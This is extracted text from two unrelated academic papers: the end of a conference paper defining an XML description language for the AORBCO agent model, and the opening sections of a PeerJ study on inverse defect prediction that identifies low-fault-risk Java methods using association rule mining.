actionBody</action_name >]  Desire::= <desire_name [/]>  [LogicExpression</desire_name >]  Plan::=<desire_name [/]>  [{<action_name>ArgumentList</action_name>} </desire_name>]  AcquaintanceBeliefSet::=<acq_Bbelief[/] >[Subject SetOfAcquaintance  ObjectSetOfAcquaintance  ClassSetOfAcquaintance  </acq_Bbelief>]  AcquaintanceAbilitySet::= <acq_Aact [/] >[{AcquaintanceAbility}</acq_Aact>]  AcquaintanceDesireSet::=<acq_Ddesire [/] > [{Desire} </acq_Ddesire>]  AcquaintancePlanSet::=<acq_Pplan [/] > [{Plan}</acq_Pplan>]  CommunicationInterface::=<address URI/>  SubjectSetOfAcquaintance:=<acq_Aagent [/]>[{<agent_name/>}</acq_Aagent>]  ObjectSetOfAcquaintance::=<acq_Oobject [/]>[<object_name/>}</acq_Oobject>]  ClassSetOfAcquaintance::=<acq_Cclass [/]>[{<class_name/>}</acq_Cclass>]  AcquaintanceAbility::=<action_name [/] >[Precondition Postcondition ParameterList</action_name>]  ObjectAttributes::=< attr_name >type:val;weight</attr_name>  ClassAttributes::=<attr_name> type: weight </attr_name>  MembershipCalculationFormula::=  <membershipformula>  FunctionExpression  </membershipformula>  Precondition::=<precondition> LogicExpression </precondition>  Postcondition::=<postcondition> LogicExpression </postcondition>  ParameterList::=<parameter [/] > [{parameter_name : type;} </parameter>]  ArgumentList::=<arguments [/] > [{arguement_name : val;} </arguments>]  ActBody::=<body>Function</body> IV. PREPARE YOUR PAPER BEFORE STYLING The AORBCO Description Language describes the AORBCO Intelligence Model in a way that unified expression of content and form ( semantics and grammar), which intent to define the language components that both humans and computers can understand. Mutual Representation is one of the characteristics of intelligent systems, that is, any thing describes itself through the relationship with other things. The AORBCO description language uses the syntax of XML with the form:<tag>...< / tag> , that is ,the label's semantics are defined by its component "...", and its components may have other labels in turn, so that the system has an intelligent mutual representation, it shows the complex relationship between the concept. Fuzziness is another characteristic of the intelligent system, that is, the degree of the closeness of the relations among things is different. The AORBCO description language is explicitly represented by the weight. In addition, the description of the acquaintance of the subject and the acquaintance of the acquaintance in the model is difference in detail. It is also an implicit expression of fuzziness. Evolution refers to subject in the system adjust constantly the relationship between subject and object. The mutual representation of things is the premise of fuzziness, and the fuzziness changes with the operation of the system, so that the whole model is in an evolving dynamic. A. Description of the agent AORBCO model is based on the idea of "one person, one world" to build a self-aware intelligent model centered on the agent. Through the analysis of the composition of human self-awareness [13] , we divide the agent into five parts: Belief, Act, Desire, Plan, behavior_controller. Belief is the agent's description of the entity it knows and entities' relationship. We hope to express the "worldview" that the agent possesses through belief, that is to say, agent's view of the world. Ability means the function that an agent can do. Desire is the target state they hope to achieve. Planning is an ordered set of capabilities that are chosen to fulfill their desire. Behavior control mechanisms enable the above components to form an organic whole. The description of the agent is as follows: <agent name> <Belief/> <Act/> <Desire/> 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 104 <Plan/> < behavior_controller /> </agent name> B. Description of the belief Belief is description of the entity agent knows and its relationship. Entities are divided into two categories: one is subject, an active acquaintance principal; another is a passive object. There are two kinds of relationship between entities. The description of the belief is shown below: <Belief> <acq_Agent/> <acq_Object/> <acq_Class/> </Belief> 1) description of the acquaintance subject <acq_Agent /> represents an acquaintance subject set, which is the mapping of other subjects that are related to the agent.Acquaintance subject have their own beliefs <acq_Bbelief/>, abilities <acq_Aact />, wishes <acq_Ddesire/>, planning <acq_Pplan/>, which are not described in detail,expect the mechanism of behavior control. In addition, the acquaintance also added the communication interface <address />, using URI as the only one address identifier. Each agent have a special subject of acquaintance, that is, himself. In the acquaintance's belief, using <acq_Aagent/>, <acq_Oobject/> and <acq_Cclass/> describe the acquaintance subject's acquaintance, objects and classes. The specific form is as follows: <acq_Agent> <agent_name> weight <acq_Bbelief> <acq_Aagent/> <acq_Oobject/> <acq_Cclass/> </acq_Bbelief> <acq_Aact/> <acq_Ddesire/> <acq_Pplan /> <address URI/> </agent_name> …… <acq_Agent> weight refers to the degree of intimacy between acquaintance subject and agent. 2) description of the object <acq_Object/> represents the set of objects that the agent knows, and <object_name/> represents an object in the set of objects and consists of the attributes of the object. Object attributes are other objects related to this object; object attributes is composed of the object attribute name <attr_name/>, the attribute type, the attribute value and weight. In fact, the external form of the subject exists in the form of the object, which is called the subjectivity of the subject. To represent the subjectivity of the subject, a special kind of object is designed to describe the characteristics of the corresponding subject, which represent the subjective perception of the object or an acquaintance. The specific description of the object is as follows: <acq_Object> <object_name> <attr_name>type:val;weight</attr_name> ...... </object_name> ...... </acq_Object> 3) description of the class In this paper, the model is divided into specific and abstract relationship, the specific relationship is reflected in the description of each element. Described in <acq_Class/> is the abstract relationship, which is the subject of object classification, including two: One is the agent's classification of the object it currently knows; the other is the agent's classification of acquaintances it knows. The classification of the acquaintance subject is based on the subject's objectivity mentioned above, so we use the same description of the object class here. Each class include 4 parts: class name <class_name/>, class attribute list, class membership calculation formula <membershipformula/>, and membership threshold weight. The class attribute indicates characteristics which the object belong to this class should have, including attribute name <attr_name />, data type and weight (weights and thresholds are expressed in weight)which means how important this attribute is in the class. The class membership degree calculation formula is based on the class attribute features to calculate the degree of object belonging to the class, the value range (0,1), membership threshold is used to specify the minimum membership value belongs to the class. The specific description is as follows: <acq_Class> <class_name> <attr_name> type:weight </attr_name> …… <membershipformula/> weight </class_name> …… </acq_Class> C. Description of the ability <Act /> here represents the set of capabilities of the agent, including several specific capabilities. Each act consists of capability name </action_name>, precondition </ precondition >, post-condition </postcondition>, formal parameter list <parameter /> and action body <body />. The precondition indicates the condition that the parameters related to the action should satisfy before the action is executed. The post-condition indicates the condition that the parameter related to the action should satisfy after the action is executed. The action body is a specific execution process. The specific description of the ability is as follows: <Act> <action_name> <precondition/> <postcondition/> 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 105 <parameter/> <body/> </action_name> …… </Act > D. Description of the desire <Desire /> indicates that the target state set of the agent contains a number of specific wishes, which is the main motivation of the agent's behavior. <desire_name/> represents one of the wishes that represent the state the agent wants to reach or maintain. These aspirations may be user agent commands or requests from other agents, or the distance between changes in the environment and hold. The realization of the wish is to make the corresponding plan through the planning function in the behavior control mechanism. During the execution of these plans, there may be changes in belief or ability to achieve the desired goal. A detailed description of the wishes is as follows: <Desire> <desire_name/> …… </Desire> E. Description of the plan <Plan /> is the best set of action sequences that the agent can make at present according to the agent's ability. Each plan consists of a desire name <desire_name/> and an action list, each composed of <action name> and an actual argument list <arguments />. <desire_name/> represents a plan for desire. The detailed description of the plan is as follows: <Plan> <desire_name> <action_name> <arguments/> </action_name> ...... </desire_name> ...... </Plan> F. Description of the behavior control mechanism <behavior_controller/> is the behavioral control mechanism of agent. It modifies its own beliefs and forms a wish through the perception of the environment, which is planned and implemented by the desire, according to its own ability or through interaction with acquaintances. In the process of implementation, it modify its beliefs and abilities and organize the other parts to make agents self-aware. V. CONCLUSION In this paper, the original AORBCO model is improved to form a new AORBCO intelligent model with agent as the core, which can describe intelligent self-awareness, mutual representation, fuzziness and dynamics more accurately; Based on XML, the definition language of AORBCO intelligent model is defined so that the expression content and form of resources are unified so that people and computers can understand the semantics of language components. The behavior control mechanism in AORBCO model integrates the agent's beliefs, abilities, wishes and programs into one. It is the core of simulating human self-learning, interaction and collaboration, planning decision-making and execution control. It will become the focus of our research in the future. ACKNOWLEDGMENT Support project of Shaanxi provincial science and Technology Department (2017GY-070); The special scientific research project of the Shaanxi Provincial Education Department (17JK0377); New network and detection control national local joint engineering laboratory fund project (GSYSJ2016011) REFERENCES [1] Luo junmin, Zheng shouqi, Zhong lianjiong. Ontology and AORBCO model [J]. Microelectronics and computer,vol.2004,21(11):pp.33-36. [2] Luo junmin, Zheng shouqi. Intelligent and intelligent model [J]. Computer engineering and application, 2006, vol.42(30):pp.38-41. [3] Luo junmin, Wu yuyun, Wu bin. Fuzzy ontology and its evolutionary research [J]. Microelectronics and computer, 2011, vol.28(5):pp.140- 143. [4] Luo junmin, Wang lei. Research on the dynamic ontology architecture based on the interaction [J]. Microelectronics and computer, 2013, vol.30(2):pp.124-127. [5] Luo junmin, Li junwei. Research on Agent self-consciousness [J]. Microelectronics and computer, 2015, vol.32(12):pp.72-75. [6] Xiao kunshou, Li de-shun, Ontology. Encyclopedia of China, vol. Ⅰ philosophy. 1987-35 [7] Feng zhiyong, Li wenjie, Li xiaohong. Ontology engineering and its application. Beijing: tsinghua university press. 2007.5. [8] Bratman, M.E. (1999) [1987]. Intention, Plans, and Practical Reason. CSLI Publications. ISBN 1-57586-192-5. [9] Ring M, Orseau l. Machine Learning in an Agent: A Generic Model and an Intelligent Agent -based on Inductive Decision Learning [J]. Journal of Artificial Intelligence, 2011, vol.4 (1) : pp.11-20. [10] taixu. Jurisprudence [M]. Business press, 2002. [11] Nils.Nilsson (Author), Wang fei, Zhao xueliang (Translator). Understanding faith. Mechanical industry press.2017.4. [12] Gasser L, Braganza C, Herman n. Chapter 5 -- MACE: A Flexible Testbed for Distributed AI Research[J]. Distributed Artificial Intelligence, 1987:pp.119-152. [13] Sun shengtao, Lu jiasheng. Self-consciousness and its research overview [J]. Psychological Exploration, 2000, vol.20(1): pp. 17-22. https://en.wikipedia.org/wiki/Center_for_the_Study_of_Language_and_Information https://en.wikipedia.org/wiki/International_Standard_Book_Number https://en.wikipedia.org/wiki/Special:BookSources/1-57586-192-5 work_w73hiptz3bcxri5xhr47jx335e ---- Too trivial to test? An inverse view on defect prediction to identify methods with low fault risk Too trivial to test? An inverse view on defect prediction to identify methods with low fault risk Rainer Niedermayr1,2, Tobias Röhm1 and Stefan Wagner2 1 CQSE GmbH, München, Germany 2 Institute of Software Technology, University of Stuttgart, Stuttgart, Germany ABSTRACT Background: Test resources are usually limited and therefore it is often not possible to completely test an application before a release. To cope with the problem of scarce resources, development teams can apply defect prediction to identify fault-prone code regions. However, defect prediction tends to low precision in cross-project prediction scenarios. Aims: We take an inverse view on defect prediction and aim to identify methods that can be deferred when testing because they contain hardly any faults due to their code being “trivial”. We expect that characteristics of such methods might be project-independent, so that our approach could improve cross-project predictions. Method: We compute code metrics and apply association rule mining to create rules for identifying methods with low fault risk (LFR). We conduct an empirical study to assess our approach with six Java open-source projects containing precise fault data at the method level. Results: Our results show that inverse defect prediction can identify approx. 32–44% of the methods of a project to have a LFR; on average, they are about six times less likely to contain a fault than other methods. In cross-project predictions with larger, more diversified training sets, identified methods are even 11 times less likely to contain a fault. Conclusions: Inverse defect prediction supports the efficient allocation of test resources by identifying methods that can be treated with less priority in testing activities and is well applicable in cross-project prediction scenarios. Subjects Data Mining and Machine Learning, Software Engineering Keywords Testing, Inverse defect prediction, Fault risk, Low-fault-risk methods INTRODUCTION In a perfect world, it would be possible to completely test every new version of a software application before it was deployed into production. In practice, however, software development teams often face a problem of scarce test resources. Developers are busy implementing features and bug fixes, and may lack time to develop enough automated unit tests to comprehensively test new code (Ostrand, Weyuker & Bell, 2005; Menzies & Di Stefano, 2004). Furthermore, testing is costly and, depending on the criticality of a system, it may not be cost-effective to expend equal test effort to all components (Zhang, Zhang & Gu, 2007). Hence, development teams need to prioritize and limit their testing scope by restricting the code regions to be tested (Menzies et al., 2003; How to cite this article Niedermayr R, Röhm T, Wagner S. 2019. Too trivial to test? An inverse view on defect prediction to identify methods with low fault risk. PeerJ Comput. Sci. 5:e187 DOI 10.7717/peerj-cs.187 Submitted 25 October 2018 Accepted 18 March 2019 Published 15 April 2019 Corresponding author Rainer Niedermayr, niedermayr@cqse.eu Academic editor Mario Luca Bernardi Additional Information and Declarations can be found on page 23 DOI 10.7717/peerj-cs.187 Copyright 2019 Niedermayr et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.187 mailto:niedermayr@�cqse.�eu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.187 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ Bertolino, 2007). To cope with the problem of scarce test resources, development teams aim to test code regions that have the best cost-benefit ratio regarding fault detection. To support development teams in this activity, defect prediction has been developed and studied extensively in the last decades (Hall et al., 2012; D’Ambros, Lanza & Robbes, 2012; Catal, 2011). Defect prediction identifies code regions that are likely to contain a fault and should therefore be tested (Menzies, Greenwald & Frank, 2007; Weyuker & Ostrand, 2008). This paper suggests, implements, and evaluates another view on defect prediction: inverse defect prediction (IDP). The idea behind IDP is to identify code artifacts (e.g., methods) that are so trivial that they contain hardly any faults and thus can be deferred or ignored in testing. Like traditional defect prediction, IDP also uses a set of metrics that characterize artifacts, applies transformations to pre-process metrics, and uses a machine-learning classifier to build a prediction model. The difference rather lies in the predicted classes. While defect prediction classifies an artifact either as buggy or non-buggy, IDP identifies methods that exhibit a low fault risk (LFR) with high certainty and does not make an assumption about the remaining methods, for which the fault risk is at least medium or cannot be reliably determined. As a consequence, the objective of the prediction also differs. Defect prediction aims to achieve a high recall, such that as many faults as possible can be detected, and a high precision, such that only few false positives occur. In contrast, IDP aims to achieve high precision to ensure that LFR methods contain indeed hardly any faults, but it does not necessarily seek to predict all non-faulty methods. Still, it is desired that IDP achieves a sufficiently high recall such that a reasonable reduction potential arises when treating LFR methods with a lower priority in QA activities. Research goal: We want to study whether IDP can reliably identify code regions that exhibit only a LFR, whether ignoring such code regions—as done silently in defect prediction—is a good idea, and whether IDP can be used in cross-project predictions. To implement IDP, we calculated code metrics for each method of a code base and trained a classifier for methods with LFR using association rule mining. To evaluate IDP, we performed an empirical study with the Defects4J dataset (Just, Jalali & Ernst, 2014) consisting of real faults from six open-source projects. We applied static code analysis and classifier learning on these code bases and evaluated the results. We hypothesize that IDP can be used to pragmatically address the problem of scarce test resources. More specifically, we hypothesize that a generalized IDP model can be used to identify code regions that can be deferred when writing automated tests if none yet exist, as is the situation for many legacy code bases. Contributions: (1) The idea of an inverse view on defect prediction: While defect prediction has been studied extensively in the last decades, it has always been employed to identify code regions with high fault risk. To the best of our knowledge, the present paper is the first to study the identification of code regions with LFR explicitly. (2) An empirical study about the performance of IDP on real open-source code bases. (3) An extension to the Defects4J dataset (Just, Jalali & Ernst, 2014): To improve data quality and enable further research—reproduction in particular—we provide code metrics for all methods in the code bases and an indication whether they were changed in a bug-fix Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 2/28 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ patch, a list of methods that changed in bug fixes only to preserve API compatibility, and association rules to identify LFR methods. The remainder of this paper is organized as follows. “Association Rule Mining” provides background information about association rule mining. “Related Work” discusses related work. “IDP Approach” describes the IDP approach, that is, the computation of the metrics for each method, the data pre-processing, and the association rule mining to identify methods with LFR. Afterward, “Empirical Study” summarizes the design and results of the IDP study with the Defects4J dataset. Then, “Discussion” discusses the study’s results, implications, and threats to validity. Finally, “Conclusion” summarizes the main findings and sketches future work. ASSOCIATION RULE MINING Association rule mining is a technique for identifying relations between variables in a large dataset and was introduced by Agrawal, Imieli�nski & Swami (1993). A dataset contains transactions consisting of a set of items that are binary attributes. An association rule represents a logical implication of the form {antecedent} / {consequent} and expresses that the consequent is likely to apply if the antecedent applies. Antecedent and consequent both consist of a set of items and are disjoint. The support of a rule expresses the proportion of the transactions that contain both antecedent and consequent out of all transactions. The support of an item X with respect to all transactions T is defined as suppðXÞ ¼ t2T:X�tj jTj j . It is related to the significance of the itemset (Simon, Kumar & Li, 2011). The confidence of a rule expresses the proportion of the transactions that contain both antecedent and consequent out of all transactions that contain the antecedent. The confidence of a rule X / Y is defined as confðX ! YÞ ¼ suppðX[YÞsuppðXÞ . It can be considered as the precision (Simon, Kumar & Li, 2011). A rule is redundant if a more general rule with the same or a higher confidence value exists (Bayardo, Agrawal & Gunopulos, 1999). Association Rule Mining has been successfully applied in defect prediction studies (Song et al., 2006; Czibula, Marian & Czibula, 2014; Ma et al., 2010; Zafar et al., 2012). A major advantage of association rule mining is the natural comprehensibility of the rules (Simon, Kumar & Li, 2011). Other commonly used machine-learning algorithms for defect prediction, such as support vector machines or Naive Bayes classifiers, generate black-box models, which lack interpretability. Even decision trees can be difficult to interpret due to the subtree-replication problem (Simon, Kumar & Li, 2011). Another advantage of association rule mining is that the gained rules implicitly extract high-order interactions among the predictors. RELATED WORK Defect prediction is an important research area that has been extensively studied (Hall et al., 2012; Catal & Diri, 2009). Defect prediction models use code metrics (Menzies, Greenwald & Frank, 2007; Nagappan, Ball & Zeller, 2006; D’Ambros, Lanza & Robbes, 2012; Zimmermann, Premraj & Zeller, 2007), change metrics (Nagappan & Ball, 2005; Hassan, 2009; Kim et al., 2007), or a variety of further metrics (such as code ownership (Bird et al., 2011; Rahman & Devanbu, 2011), developer interactions (Meneely et al., 2008; Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 3/28 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ Lee et al., 2011), dependencies to binaries (Zimmermann & Nagappan, 2008), mutants (Bowes et al., 2016), code smells (Palomba et al., 2016) to predict code areas that are especially defect-prone. Such models allow software engineers to focus quality-assurance efforts on these areas and thereby support a more efficient resource allocation (Menzies, Greenwald & Frank, 2007; Weyuker & Ostrand, 2008). Defect prediction is usually performed at the component, package or file level (Nagappan & Ball, 2005; Nagappan, Ball & Zeller, 2006; Bacchelli, D’Ambros & Lanza, 2010; Scanniello et al., 2013). Recently, more fine-grained prediction models have been proposed to narrow down the scope for quality-assurance activities. Kim, Whitehead & Zhang (2008) presented a model to classify software changes. Hata, Mizuno & Kikuno (2012) applied defect prediction at the method level and showed that fine-grained prediction outperforms coarse-grained prediction at the file or package level if efforts to find the faults are considered. Giger et al. (2012) also investigated prediction models at the method level and concluded that a Random Forest model operating on change metrics can achieve good performance. More recently, Pascarella, Palomba & Bacchelli (2018) replicated this study and confirmed the results. However, they reported that a more realistic inter-release evaluation of the models shows a dramatic drop in performance with results close to that of a random classifier and concluded that method-level bug prediction is still an open challenge (Pascarella, Palomba & Bacchelli, 2018). It is considered difficult to achieve sufficiently good data quality at the method level (Hata, Mizuno & Kikuno, 2012; Shippey et al., 2016); publicly available datasets have been provided in Shippey et al. (2016), Just, Jalali & Ernst (2014), and Giger et al. (2012). Cross-project defect prediction predicts defects in projects for which no historical data exists by using models trained on data of other projects (Zimmermann et al., 2009; Xia et al., 2016). He et al. (2012) investigated the usability of cross-project defect prediction. They reported that cross-project defect prediction works only in few cases and requires careful selection of training data. Zimmermann et al. (2009) also provided empirical evidence that cross-project prediction is a serious problem. They stated that projects in the same domain cannot be used to build accurate prediction models without quantifying, understanding, and evaluating process, data and domain. Similar findings were obtained by Turhan et al. (2009), who investigated the use of cross-company data for building prediction models. They found that models using cross-company data can only be “useful in extreme cases such as mission-critical projects, where the cost of false alarms can be afforded” and suggested using within-company data if available. While some recent studies reported advances in cross-project defect prediction (Xia et al., 2016; Zhang et al., 2016; Xu et al., 2018), it is still considered as a challenging task. Our work differs from the above-mentioned work in the target setting: we do not predict artifacts that are fault-prone, but instead identify artifacts (methods) that are very unlikely to contain any faults. While defect prediction aims to detect as many faults as possible (without too many false positives), and thus strives for a high recall (Mende & Koschke, 2009), our IDP approach strives to identify those methods that are not fault-prone to a high certainty. Therefore, we optimized our approach toward the precision in detecting LFR methods. To the best of our knowledge, this is the first work to Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 4/28 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ study LFR methods. Moreover, as far as we know, cross-project prediction has not yet been applied at the method level. To perform the classification, we applied association rule mining. Association rule mining has previously been applied with success in defect prediction (Song et al., 2006; Morisaki et al., 2007; Czibula, Marian & Czibula, 2014; Ma et al., 2010; Karthik & Manikandan, 2010; Zafar et al., 2012). IDP APPROACH This section describes the IDP approach, which identifies LFR methods. The approach comprises the computation of source-code metrics for each method, the data pre- processing before the mining, and the association rule mining. Figure 1 illustrates the steps. Metric computation Like defect prediction models, IDP uses metrics to train a classifier for identifying LFR methods. For each method, we compute the source-code metrics listed in Table 1 that we considered relevant to judge whether a method is trivial. They comprise established length and complexity metrics used in defect prediction, metrics regarding occurrences of programming-language constructs, and categories describing the purpose of a method. SLOC is the number of source lines of code, that is, LOC without empty lines and comments. Cyclomatic Complexity corresponds to the metric proposed by McCabe (1976). Despite this metric being controversial (Shepperd, 1988; Hummel, 2014)—due to the fact that it is not actionable, difficult to interpret, and high values do not necessarily translate to low readability—it is commonly used as variable in defect prediction (Menzies et al., 2002, 2004; Zimmermann, Premraj & Zeller, 2007). Furthermore, a low number of paths through a method could be relevant for identifying LFR methods. Figure 1 Overview of the approach. Metrics for faulty methods are computed at the faulty state; metrics for non-faulty methods are computed at the state of the last bug-fix commit. Full-size DOI: 10.7717/peerj-cs.187/fig-1 Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 5/28 http://dx.doi.org/10.7717/peerj-cs.187/fig-1 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ Maximum nesting depth corresponds to the “maximum number of encapsulated scopes inside the body of the method” (NDepend, 2017). Deeply nested code is more difficult to understand, therefore, it could be more fault-prone. Maximum method chaining expresses the maximum number of chain elements of a method invocation. We consider a method call to be chained if it is directly invoked on the result from the previous method invocation. The value for a method is zero if it does not contain any method invocations, one if no method invocation is chained, or otherwise the maximum number of chain elements (e.g., two for getId().toString(), three for getId().toString(). subString(1)). Unique variable identifiers counts the distinct names of variables that are used within the method. The following metrics, metrics M6–M31, count the occurrences of the respective Java language construct (Gosling et al., 2013). Next, we derive further metrics from the existing ones. They are redundant, but correlated metrics do not have any negative effects on association rule mining (except on the computation time) and may improve the results for the following reason: if an item generated from a metric is not frequent, rules with this item will be discarded because they cannot achieve the minimum support; however, an item for a more general metric may be more frequent and survive. The derived metrics are: � All Conditions, which sums up If Conditions, Switch-Case Blocks, and Ternary Operations (M16 + M27 + M29) � All Arithmetic Operations, which sums up Incrementations, Decrementations, and Arithmetic Infix Operations (M7 + M8) Furthermore, we compute to which of the following categories a method belongs (a method can belong to zero, one, or more categories): � Constructors: Special methods that create and initialize an instance of a class. They might be less fault-prone because they often only set class variables or delegate to another constructor. � Getters: Methods that return a class or instance variable. They usually consist of a single statement and can be generated by the IDE. � Setters: Methods that set the value of a class or instance variable. They usually consist of a single statement and can be generated by the IDE. � Empty Methods: Non-abstract methods without any statements. They often exist to meet an implemented interface, or because the default logic is to do nothing and is supposed to be overridden in certain sub-classes. � Delegation Methods: Methods that delegate the call to another method with the same name and further parameters. They often do not contain any logic besides the delegation. � ToString Methods: Implementations of Java’s toString method. They are often used only for debugging purposes and can be generated by the IDE. Note that we only use source-code metrics and do not consider process metrics. This is because we want to identify methods that exhibit a LFR due to their code. Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 6/28 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ Association rule mining computes frequent item sets from categorical attributes; therefore, our next step is to discretize the numerical metrics. In defect prediction, discretization is also applied to the metrics: Shivaji et al. (2013) and McCallum & Nigam (1998) reported that Table 1 Computed metrics for each method. Metric name Type M1 Source lines of code (SLOC) Length M2 Cyclomatic complexity (CC) Complexity M3 Maximum nesting depth Maximum value M4 Maximum method chaining Maximum value M5 Unique variable identifiers Unique count M6 Anonymous class declarations Count M7 Arithmetic In- or Decrementations Count M8 Arithmetic infix operations Count M9 Array accesses Count M10 Array creations Count M11 Assignments Count M12 Boolean operators Count M13 Cast expressions Count M14 Catch clauses Count M15 Comparison operators Count M16 If conditions Count M17 Inner method declarations Count M18 Instance-of checks Count M19 Instantiations Count M20 Loops Count M21 Method invocations Count M22 Null checks Count M23 Null literals Count M24 Return statements Count M25 String literals Count M26 Super-method invocations Count M27 Switch-Case blocks Count M28 Synchronized blocks Count M29 Ternary operations Count M30 Throw statements Count M31 Try blocks Count M32 All conditions Count M33 All arithmetic operations Count M34 Is constructor Boolean M35 Is setter Boolean M36 Is getter Boolean M37 Is empty method Boolean M38 Is delegation method Boolean M39 Is ToString method Boolean Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 7/28 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ binary values can yield better results than using counts when the number of features is low. We discretize as follows: � For each of the metrics M1–M5, we inspect their distribution and create three classes. The first class is for metric values until the first tertile, the second class for values until the second tertile, and the third class for the remaining values. � For all count metrics (including the derived ones), we create a binary “has-no”-metric, which is true if the value is zero, e.g., CountLoops = 0 ⇒ NoLoops = true. � For the method categories (setter, getter, : : : ), no transformation is necessary as they are already binary. Data pre-processing At this point, we assume that we have a list of faulty methods with their metrics at the faulty state (the list may contain a method multiple times if it was fixed multiple times) and a list of all methods. Faulty methods can be obtained by identifying methods that were changed in bug-fix commits (Zimmermann, Premraj & Zeller, 2007; Giger et al., 2012; Shippey et al., 2016). A method is considered as faulty when it was faulty at least once in its history; otherwise it is considered as not faulty. We describe in “Fault data extraction” how we extracted faulty methods from the Defects4J dataset. Prior to applying the mining algorithm, we have (1) to address faulty methods with multiple occurrences, (2) to create a unified list of faulty and non-faulty methods, and (3) to tackle dataset imbalance. Steps (1) and (2) require that a method can be uniquely identified. To satisfy this requirement, we identified a method by its name, its parameter types, and the qualified name of its surrounding class. We integrated the computation of the metrics into the source-code analysis tool Teamscale (Heinemann, Hummel & Steidl, 2014; Haas, Niedermayr & Jurgens, 2019), which is aware of the code history and tracks method genealogies. Thereby, Teamscale detects method renames or parameter changes so that we could update the method identifier when it changed. (1) A method may be fixed multiple times; in this case, a method appears multiple times in the list of the faulty methods. However, each method should have the same weight and should therefore be considered only once. Consequently, we consolidate multiple occurrences of the same method: we replace all occurrences by a new instance and apply majority voting to aggregate the binary metric values. It is common practice in defect prediction to have a single instance of every method with a flag that indicates whether a method was faulty at least once (Menzies et al., 2010; Giger et al., 2012; Shippey et al., 2016; Mende & Koschke, 2009). (2) To create a unified dataset, we take the list of all methods, remove those methods that exist in the set of the faulty methods, and add the set of the faulty methods with the metrics computed at the faulty state. After doing that, we end up with a list containing each method exactly once and a flag indicating whether a method was faulty or not. Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 8/28 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ (3) Defect datasets are often highly imbalanced (Khoshgoftaar, Gao & Seliya, 2010), with faulty methods being underrepresented. Therefore, we apply SMOTE1, a well- known algorithm for over- and under-sampling, to address imbalance in the dataset used for training (Longadge, Dongre & Malik, 2013; Chawla et al., 2002). It artificially generates new entries of the minority class using the nearest neighbors of these cases and reduces entries from the majority class (Torgo, 2010). If we do not apply SMOTE to highly imbalanced datasets, many non-expressive rules will be generated when most methods are not faulty. For example, if 95% of the methods are not faulty and 90% of them contain a method invocation, rules with high support will be generated that use this association to identify non-faulty methods. Balancing avoids those nonsense rules. IDP classifier To identify LFR methods, we compute association rules of the type {Metric1, Metric2, Metric3, : : : } / {NotFaulty}. Examples for the metrics are SlocLowestThird, NoNullChecks, IsSetter. A method that satisfies all metric predicates of a rule is not faulty to the certainty expressed by the confidence of the rule. The support of the rule expresses how many methods with these characteristics exist, and thus, it shows how generalizable the rule is. After computing the rules on a training set, we remove redundant ones (see “Association Rule Mining”) and order the remaining rules first descending by their confidence and then by their support. To build the LFR classifier, we combine the top n association rules with the highest confidence values using the logical-or operator. Hence, we consider a method to have a LFR if at least one of the top n rules matches. To determine n, we compute the maximum number of rules until the faulty methods in the LFR methods exceed a certain threshold in the training set. Of course, IDP can also be used with other machine-learning algorithms. We decided to use association rule mining because of the natural comprehensibility of the rules (see “Association Rule Mining”) and because we achieved a better performance compared to models we trained using Random Forest. EMPIRICAL STUDY This section reports on the empirical study that we conducted to evaluate the IDP approach. Research questions We investigate the following questions to research how well methods that contain hardly any faults can be identified and to study whether IDP is applicable in cross-project scenarios. RQ 1: What is the precision of the classifier for low-fault-risk methods? To evaluate the precision of the classifier, we investigate how many methods that are classified as “LFR” (due to the triviality of their code) are faulty. If we want to use the LFR classifier for determining methods that require less focus during quality assurance (QA) activities, 1 Synthetic minority over-sampling technique. Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 9/28 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ such as testing and code reviews, we need to be sure that these methods contain hardly any faults. RQ 2: How large is the fraction of the code base consisting of methods classified as “low fault risk”? We study how common LFR methods are in code bases to find out how much code is of lower importance for quality-assurance activities. We want to determine which savings potential can arise if these methods are excluded from QA. RQ 3: Is a trained classifier for methods with low fault risk generalizable to other projects? Cross-project defect prediction is used to predict faults in (new) projects, for which no historical fault data exists, by using models trained on other projects. It is considered a challenging task in defect prediction (He et al., 2012; Zimmermann et al., 2009; Turhan et al., 2009). As we expect that the characteristics of LFR methods might be project-independent, IDP could be applicable in a cross-project scenario. Therefore, we investigate how generalizable our IDP classifier is for cross-project use. RQ 4: How does the classifier perform compared to a traditional defect prediction approach? The main purpose of defect prediction is to detect fault-prone code. Most traditional defect prediction approaches are binary classifications, which classify a method either as (likely) faulty or not faulty. Hence, they implicitly also detect methods with a LFR. Therefore, we compare the performance of our classifier with the performance of a traditional defect prediction approach. Study objects For our analysis, we used data from Defects4J, which was created by Just, Jalali & Ernst (2014). Defects4J is a database and analysis framework that provides real faults for six real-world open-source projects written in Java. For each fault, the original commit before the bug fix (faulty version), the original commit after the bug fix (fixed version), and a minimal patch of the bug fix are provided. The patch is minimal such that it contains only code changes that (1) fix the fault and (2) are necessary to keep the code compilable (e.g., when a bug fix involves method-signature changes). It does not contain changes that do not influence the semantics (e.g., changes in comments, local renamings), and changes that were included in the bug-fix commit but are not related to the actual 